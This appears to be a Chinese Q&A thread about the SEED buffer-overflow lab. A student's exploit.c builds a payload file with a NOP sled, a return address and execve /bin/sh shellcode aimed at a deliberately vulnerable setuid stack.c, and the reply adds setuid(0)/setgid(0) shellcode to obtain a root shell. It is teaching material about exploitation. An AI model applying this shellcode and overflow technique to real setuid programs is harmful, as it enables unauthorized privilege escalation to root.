我想,您可以在 shellcode 中加入 setuid() 和 setgid() 系统调用。
我正在做一个实验作业(请参阅http://www.cis.syr.edu/~wedu/seed/Labs_12.04/Software/Buffer_Overflow/),当我运行 ./stack 时,得到的是 Trace/breakpoint trap 而不是 root shell。以下是我的 exploit.c(它创建 badfile)和 stack.c(它读取 badfile,并用 strcpy 把内容复制到一个容纳不下它的缓冲区中)的代码。
exploit.c
/* exploit.c */ /* A program that creates a file containing code for launching shell*/ #include <stdlib.h> #include <stdio.h> #include <string.h> char shellcode[]= "\x31\xc0" /* xorl %eax,%eax */ "\x50" /* pushl %eax */ "\x68""//sh" /* pushl $0x68732f2f */ "\x68""/bin" /* pushl $0x6e69622f */ "\x89\xe3" /* movl %esp,%ebx */ "\x50" /* pushl %eax */ "\x53" /* pushl %ebx */ "\x89\xe1" /* movl %esp,%ecx */ "\x99" /* cdq */ "\xb0\x0b" /* movb $0x0b,%al */ "\xcd\x80" /* int $0x80 */ ; void main(int argc, char **argv) { char buffer[517]; FILE *badfile; /* Initialize buffer with 0x90 (NOP instruction) */ memset(&buffer, 0x90, 517); /* You need to fill the buffer with appropriate contents here */ memset(buffer + 39, 0xbf, 1); memset(buffer + 38, 0xff, 1); memset(buffer + 37, 0xf1, 1); memset(buffer + 36, 0x40, 1); strcpy(buffer + 492, shellcode); /* Save the contents to the file "badfile" */ badfile = fopen("./badfile", "w"); fwrite(buffer, 517, 1, badfile); fclose(badfile); }
stack.c
/* stack.c */
/* This program has a buffer overflow vulnerability. */
/* Our task is to exploit this vulnerability */
#include <stdlib.h>
#include <stdio.h>
#include <string.h>

/*
 * bof - copies str into a fixed 24-byte stack buffer.
 *
 * @str: input treated as a NUL-terminated string. The only caller passes up
 *       to 517 bytes read from "badfile", which are never NUL-terminated by
 *       the caller.
 * Returns 1 unconditionally.
 *
 * strcpy() stops only at the first NUL byte and never consults the size of
 * the destination, so any input longer than 23 bytes writes past `buffer`
 * into the rest of bof's stack frame (on a typical layout, the saved frame
 * pointer and return address). A bounded copy, e.g.
 * snprintf(buffer, sizeof buffer, "%s", str), would prevent this; it is left
 * as-is here because the overflow is the lab's intended defect.
 */
int bof(char *str)
{
    char buffer[24];
    /* The following statement has a buffer overflow problem */
    strcpy(buffer, str);   /* unbounded write: sizeof buffer is never checked */
    return 1;
}

/*
 * main - reads up to 517 bytes from "badfile" into str and hands it to bof().
 *
 * Review notes:
 *  - The fopen() result is not checked; if "badfile" is missing, fread() is
 *    called with a NULL FILE * (undefined behaviour).
 *  - fread()'s return value is ignored and str is never NUL-terminated, so a
 *    full 517-byte file leaves strcpy() in bof() reading beyond str until it
 *    happens to meet a NUL byte.
 *  - argc/argv are unused: passing compiler flags such as
 *    -D_FORTIFY_SOURCE=0 on the command line of the built binary has no
 *    effect on its behaviour.
 *  - main returns 1 (a non-zero exit status) even on the "Returned Properly"
 *    path.
 * The lab builds this file with -z execstack -fno-stack-protector, i.e. with
 * the stack canary disabled and the stack marked executable; those are the
 * two mitigations that would otherwise detect or stop this overflow.
 */
int main(int argc, char **argv)
{
    char str[517];
    FILE *badfile;
    badfile = fopen("badfile", "r");            /* NOTE(review): NULL not handled */
    fread(str, sizeof(char), 517, badfile);     /* NOTE(review): short read / no terminator */
    bof(str);
    printf("Returned Properly\n");
    return 1;
}
我编译了 stack.c,并以 root 身份设置了权限(如下):
root:/home/seed# gcc -g -o stack -z execstack -fno-stack-protector stack.c root:/home/seed# chown root stack root:/home/seed# chmod 4755 stack
我以我自己(seed 用户)的身份编译 exploit.c:
seed:~$ gcc -g -o exploit exploit.c
我运行 ./exploit 创建 badfile,没有收到任何错误。运行 ./stack 时得到 Trace/breakpoint trap。如果运行 gdb stack,我能得到一个 shell,但它不是 root shell。gdb-peda$ run Starting program: /home/seed/stack process 24232 is executing new program: /bin/dash $
如果我运行 seed:~$ ./stack -D_FORTIFY_SOURCE=0,我也能得到一个 shell,但同样不是 root。seed:~$ ./stack -D_FORTIFY_SOURCE=0 $ id uid=1000(seed) gid=1000(seed) $
那么,我需要改什么才能得到 root shell?
我想,您可以在 shellcode 中加入 setuid() 和 setgid() 系统调用。
char shellcode[]= "\x31\xdb\x89\xd8\xb0\x17\xcd\x80" // setuid(0); "\x31\xdb\x89\xd8\xb0\x2e\xcd\x80" // setgid(0); "\x31\xc0" /* xorl %eax,%eax */ "\x50" /* pushl %eax */ "\x68""//sh" /* pushl $0x68732f2f */ "\x68""/bin" /* pushl $0x6e69622f */ "\x89\xe3" /* movl %esp,%ebx */ "\x50" /* pushl %eax */ "\x53" /* pushl %ebx */ "\x89\xe1" /* movl %esp,%ecx */ "\x99" /* cdq */ "\xb0\x0b" /* movb $0x0b,%al */ "\xcd\x80" /* int $0x80 */ ;
当然,还要将所有者改为 root。